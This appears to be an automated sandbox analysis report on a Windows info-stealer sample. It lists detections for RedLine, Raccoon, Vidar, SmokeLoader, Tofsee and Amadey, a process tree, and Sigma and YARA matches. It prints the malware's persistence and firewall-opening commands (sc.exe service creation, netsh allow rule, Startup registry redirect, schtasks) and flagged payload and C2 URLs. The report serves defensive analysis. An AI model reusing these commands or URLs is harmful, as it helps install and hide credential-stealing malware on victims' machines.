
Windows Analysis Report zmbGUZTICp.exe

Overview

General Information

Sample Name: zmbGUZTICp.exe
Analysis ID: 553117
MD5: 9af4d2022dc05c2dbbc4d218a8f0974c
SHA1: f87c7511d2c4ea4894603d3cfddd478c8c2b3ead
SHA256: c8fe81088b2caa9df35d92a588fb266a145c95b81b5c66d5bfe181fa73b17d82
Tags: exe, RaccoonStealer

Detection

Amadey, Raccoon, RedLine, SmokeLoader, Tofsee, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to evade analysis by executing special instructions which cause a usermode exception
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Sigma detected: Suspicius Add Task From User AppData Temp
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Sigma detected: Direct Autorun Keys Modification
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • zmbGUZTICp.exe (PID: 4404 cmdline: "C:\Users\user\Desktop\zmbGUZTICp.exe" MD5: 9AF4D2022DC05C2DBBC4D218A8F0974C)
    • zmbGUZTICp.exe (PID: 3416 cmdline: "C:\Users\user\Desktop\zmbGUZTICp.exe" MD5: 9AF4D2022DC05C2DBBC4D218A8F0974C)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 1E7F.exe (PID: 5200 cmdline: C:\Users\user\AppData\Local\Temp\1E7F.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 5648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 2DB3.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\2DB3.exe MD5: 6009BCB680BE6C0F656AA157E56423DC)
        • 309C.exe (PID: 5132 cmdline: C:\Users\user\AppData\Local\Temp\309C.exe MD5: 8B25D9317E18654C3F83EF8630D1DE16)
          • cmd.exe (PID: 852 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5820 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 4636 cmdline: C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5360 cmdline: C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1148 cmdline: "C:\Windows\System32\sc.exe" start ozuqupbe MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 5308 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 3F71.exe (PID: 5196 cmdline: C:\Users\user\AppData\Local\Temp\3F71.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 3F71.exe (PID: 1508 cmdline: C:\Users\user\AppData\Local\Temp\3F71.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • A7F0.exe (PID: 2200 cmdline: C:\Users\user\AppData\Local\Temp\A7F0.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • BC16.exe (PID: 2576 cmdline: C:\Users\user\AppData\Local\Temp\BC16.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
          • mjlooy.exe (PID: 4660 cmdline: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" MD5: 8B239554FE346656C8EEF9484CE8092F)
            • cmd.exe (PID: 5416 cmdline: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • reg.exe (PID: 3168 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • schtasks.exe (PID: 4000 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • D452.exe (PID: 5572 cmdline: C:\Users\user\AppData\Local\Temp\D452.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
          • AppLaunch.exe (PID: 5588 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • 239.exe (PID: 5632 cmdline: C:\Users\user\AppData\Local\Temp\239.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
          • AppLaunch.exe (PID: 2152 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • 1D34.exe (PID: 2696 cmdline: C:\Users\user\AppData\Local\Temp\1D34.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 2D04.exe (PID: 2896 cmdline: C:\Users\user\AppData\Local\Temp\2D04.exe MD5: 6ADB5470086099B9169109333FADAB86)
  • gdrgbdj (PID: 2468 cmdline: C:\Users\user\AppData\Roaming\gdrgbdj MD5: 9AF4D2022DC05C2DBBC4D218A8F0974C)
    • gdrgbdj (PID: 3492 cmdline: C:\Users\user\AppData\Roaming\gdrgbdj MD5: 9AF4D2022DC05C2DBBC4D218A8F0974C)
  • svchost.exe (PID: 5636 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5668 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • tejjnepq.exe (PID: 2320 cmdline: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe" MD5: 310337FA2432C256984AA89486B74D95)
    • svchost.exe (PID: 4692 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 5368 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • mjlooy.exe (PID: 2988 cmdline: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
  • mjlooy.exe (PID: 3916 cmdline: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
0000002E.00000002.664274182.00000000076A6000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000022.00000002.583256444.00000000000C2000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
0000002E.00000002.636412165.0000000000402000.00000020.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(5 of 49 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
13.2.3F71.exe.370f910.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
28.0.3F71.exe.400000.12.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
1.0.zmbGUZTICp.exe.400000.5.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
11.3.309C.exe.660000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
24.2.tejjnepq.exe.400000.0.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
(5 of 29 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe", ParentImage: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe, ParentProcessId: 2320, ProcessCommandLine: svchost.exe, ProcessId: 4692
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started; Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\309C.exe, ParentImage: C:\Users\user\AppData\Local\Temp\309C.exe, ParentProcessId: 5132, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\, ProcessId: 5820
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe", ParentImage: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe, ParentProcessId: 2320, ProcessCommandLine: svchost.exe, ProcessId: 4692
Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe, ParentProcessId: 4660, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, ProcessId: 4000
Sigma detected: Netsh Port or Application Allowed
Source: Process started; Author: Markus Neis, Sander Wiebing; Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\309C.exe, ParentImage: C:\Users\user\AppData\Local\Temp\309C.exe, ParentProcessId: 5132, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 5308
Sigma detected: Direct Autorun Keys Modification
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5416, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, ProcessId: 3168
Sigma detected: New Service Creation
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\309C.exe, ParentImage: C:\Users\user\AppData\Local\Temp\309C.exe, ParentProcessId: 5132, ProcessCommandLine: C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 4636

Jbx Signature Overview

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match; File source: 31.2.A7F0.exe.4d60e50.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.A7F0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.3.A7F0.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.A7F0.exe.4d60e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.3.A7F0.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.A7F0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://185.163.45.70/capibar; Avira URL Cloud: Label: phishing
Source: http://185.7.214.171:8080/6.php; URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exe; Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe; URL Reputation: Label: phishing
Source: http://185.163.204.22/capibar; Avira URL Cloud: Label: malware
Source: https://185.163.204.22/capibar; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exe; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe; Avira URL Cloud: Label: malware
Source: http://185.215.113.35/d2VxjasuwS/plugins/cred.dll; Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3F71.exe; Avira: detection malicious, Label: HEUR/AGEN.1211353
Multi AV Scanner detection for submitted file
Source: zmbGUZTICp.exe; Virustotal: Detection: 35%
Source: zmbGUZTICp.exe; ReversingLabs: Detection: 41%
Multi AV Scanner detection for domain / URL
Source: http://185.163.45.70/capibar; Virustotal: Detection: 11%
Machine Learning detection for sample
Source: zmbGUZTICp.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\239.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2D04.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\309C.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1E7F.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1D34.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3F71.exe; Joe Sandbox ML: detected
Source: 24.3.tejjnepq.exe.650000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.2DB3.exe.630e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 24.2.tejjnepq.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 11.2.309C.exe.630e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 31.3.A7F0.exe.4d10000.2.unpack; Avira: Label: TR/Crypt.EPACK.Gen2
Source: 8.3.2DB3.exe.650000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 27.2.svchost.exe.4d0000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 11.3.309C.exe.660000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 24.2.tejjnepq.exe.630e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 24.2.tejjnepq.exe.ed0000.2.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 11.2.309C.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Unpacked PE file: 8.2.2DB3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\309C.exe; Unpacked PE file: 11.2.309C.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe; Unpacked PE file: 24.2.tejjnepq.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Unpacked PE file: 31.2.A7F0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Unpacked PE file: 31.2.A7F0.exe.400000.0.unpack
Source: zmbGUZTICp.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\1E7F.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown; HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.6:49703 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49762 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: Binary string: C:\zazadix dori\kol.pdb source: 2DB3.exe, 00000008.00000000.453772125.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: A7F0.exe, 0000001F.00000002.646423634.0000000002E20000.00000040.00000001.sdmp, A7F0.exe, 0000001F.00000003.532814882.0000000003020000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb* source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467405426.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467933513.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467565394.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467354885.000000000500A000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb. source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: A7F0.exe, 0000001F.00000002.675040264.000000006BE60000.00000002.00020000.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.469360624.00000000032B0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467390023.00000000032B0000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
